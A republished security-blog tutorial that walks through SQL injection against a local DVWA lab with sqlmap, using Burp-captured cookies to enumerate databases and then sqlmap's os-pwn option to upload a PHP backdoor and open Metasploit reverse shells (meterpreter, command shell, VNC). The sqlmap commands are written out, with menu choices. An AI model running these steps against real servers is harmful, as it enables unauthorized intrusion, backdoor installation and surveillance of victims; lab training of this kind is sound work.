Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

$
0
0

This artilce is about how to use sqlmap for sql injection to hack victim pc and gain shell access. Here I had perform sql attack to gain three different type of shell (meterpreter; command shell; VNC )

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username admin

Password password

Click on DVWA Security and set Website Security Level low

From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Turn on burp suite click on proxy in menu bar and go for intercept is on button . Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will be used later in sqlmap commands.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Lets enumerate all databases name using “referrer and cookies” under sqlmap command.

sqlmap -u “http://192.168.1.79:81/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” cookie=” security=low; phpSESSID=jgs556oh1j1n8pc1ea0ovmeed47 ″ dbs.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

It has dumped all names of database. Now I am going to choose dvwa to access its back-end database management system.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Now type following command to access shell of web server and follow the screenshot.

sqlmap -u “http://192.168.1.79:81/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” cookie=” security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47 ″ -D dvwa os-pwn


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Type 1 for metasploit framework to establish a reverse connection then type 4 for php payload for supporting server and again type 1 for common location for writable directory to upload payload as backdoor in victim PC.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Here Type 1 for reverse tcp connection as default option. Now I will choose these entire three payloads one by one and try to hack web server every time. Now type 1 for meterpreter.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

It will load metasploit framework and provides meterpreter session 1.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Repeat the whole process till reverse tcp connection when further it ask to choose payload, then type 2 for shell.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Again it will load metasploit framework and provides command shell session 1.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Repeat the whole process till reverse tcp connection when further it ask to choose payload, this time now type 3 for VNC.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Again it will load metasploit framework and launchVNC viewer.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Here you can see from the given screenshot that I had access victim pc through tightVNC and now victims each moment will be kept under my observation. Hence we have hacked victim pc three times with various type shell.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

Author : AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Viewing all articles
Browse latest Browse all 12749

Trending Articles